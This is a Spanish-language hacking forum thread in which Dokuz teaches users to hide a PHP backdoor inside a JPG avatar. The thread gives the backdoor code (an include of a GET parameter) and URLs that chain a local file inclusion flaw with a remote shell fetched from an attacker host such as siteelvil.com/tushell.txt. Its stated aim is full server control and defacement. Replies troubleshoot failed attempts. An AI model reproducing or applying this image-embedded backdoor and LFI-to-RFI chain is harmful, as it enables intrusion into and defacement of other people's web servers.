[Video tutorial] Insertar php en una imagen jpg por Dokuz

**Dokuz** · 28/12/2009 03:05

Insertar php en una imagen jpg por Dokuz

En este video tutorial les voy a explicar a como inyecctar codigo php en una imagen jpg.
Para hacer esto no usen el Mozilla Firefox tienen que usar el Iexplorer si no, no se ven bien las imagenes modificadas, cuando la queremos ejecutar se ven como si las abrieramos con un block de notas y el php no se ejecuta bien algunas veces.

You must click 'Thank You' before you can see the data contained here.

You do not have sufficient rights to see the hidden data contained here.

Ejemplo de web vulnerable a LFI y nos deja subir avateres:
---------------------------------------------------------

[Dear Guest/Member you can't see link before replyclick here to register]

Ese ejemplo seria una web 100% vulnerable y podriamos ejecutar comandos para poner nuestras shell y tener en nuestras manos el servidor completo.

Espero que les guste el video.... Cualquier cosa me disen.

Video Tutorial por Dokuz

Saludos. V_SvPIN

**Cofer** · 04/01/2010 15:14

me podrias indicar para que serviria, o en privado, para darme ideas porque estoy demasiado verde en esto...
podria poner en esa imagen un codigo para que haga un download de un ejecutable subido a un hosting??
Gracias !!

**Dokuz** · 04/01/2010 16:20

Bueno, pero creo que esta en el post el ejemplo de una web vulnerable, en la imgen tu puedes insertar php como dije, bueno bien en vez de hacer un download, puedes dejarle un bug de RFI a la web como este.

Código:

www.sitio.com/index?page=imagenes/avatar.jpg?bug=http://siteelvil.com/tushell.txt?

El codigo php que debes introducir en la imagen seria

Código:

<?php
$bug=$_GET['bug'];
@include("$bug");
?>

entonces la guardas la subes al hosting y ejecutas lo que te mensione al principio osea esto..

Código:

www.sitio.com/index?page=imagenes/avatar.jpg?bug=http://siteelvil.com/tushell.txt?

y ya con la shell puedes manejar todo a tu gusto.

*Estos son ejemplos y tecnicas muy conocidas, para el defacing tendras que tener imaginación y probar diferentes cosas que a ti te parescan que esten bien mas halla de que te equivoques y no funcione, solo así hiras aprendiendo.

PD: (para los administradores y moderadores) Respondo este mensaje por que creo que no rompo ninguna regla en este foro, si es así y estoy rompiendo una regla por favor indicarme cual es y borrare el mensaje inmediatamente. Contal de que no me borren el post que hice sobre este video tutorial.

Saludos.

**Cofer** · 04/01/2010 20:43

Muchisimas gracias, y perdona por las molestias

**n3wb13** · 06/01/2010 20:44

buen video, por un momento pense q era un nuevo exploit, hace años conoci esa tool y vi el video de Codebreacker ;-)

**Gusan0r** · 13/02/2010 00:11

Gracias espero que me sirva

**Dokuz** · 13/02/2010 00:23

Iniciado por Gusan0r [Dear Guest/Member you can't see link before replyclick here to register]

Gracias espero que me sirva

Si, sirve si esta bien aplicada la técnica funciona sin problemas.

Saludos.

**bigi** · 16/02/2010 04:18

bueno a ver , preguntita rapida.
Estuve intentandolo esta tarde y no me anda muy bien.
la e subido a sitio.com/images/imagen.jpg?bug=http://google.com y no me tira. e puesto el codigo php k dijiste dentro de eya y asi todavia no me furula. al abrirla la imagen se ve perfectamente, es muy raro. alguna idea?
gracias de antemano

**Dokuz** · 16/02/2010 15:19

Iniciado por bigi [Dear Guest/Member you can't see link before replyclick here to register]

bueno a ver , preguntita rapida.
Estuve intentandolo esta tarde y no me anda muy bien.
la e subido a sitio.com/images/imagen.jpg?bug=http://google.com y no me tira. e puesto el codigo php k dijiste dentro de eya y asi todavia no me furula. al abrirla la imagen se ve perfectamente, es muy raro. alguna idea?
gracias de antemano

No, sabes donde tienes el error mira la web tiene que ser vulnerable a LFI Local File Inclusion de esta forma

Código:

www.sitio.com/index?page=imagenes/avatar.jpg

Entonces ahi si se ejecuta el php que tiene dentro de la imagen y lo entonces ahí si pones así.

[Dear Guest/Member you can't see link before replyclick here to register]index?page=imagenes/avatar.jpg?bug=http://google.com

Pero tu lo estas ejecutando mal por lo visto así

Código:

sitio.com/images/imagen.jpg?bug=http://google.com

y como ves eso esta mal.

si no ves todabia el error o tienes alguna duda me dices.

Saludos. V_SvPIN

**bigi** · 16/02/2010 15:42

a vale tiene k ser vulnerable a LFI, aora tiene mas sentido xDD
Por otro lado si es vulnerabl a LFI no se ace antes a acer

"www.sitio.com/index?page=imagenes/avatar.jpg?bug=http://sitiomalvado.com/shell.php"

sin necesidad de estas subiendo imagenes y todo eso.. ?

Tema: [Video tutorial] Insertar php en una imagen jpg por Dokuz

Herramientas

Visualizar

[Video tutorial] Insertar php en una imagen jpg por Dokuz

Who Said Thanks:

Etiquetas para este Tema

Permisos de Publicación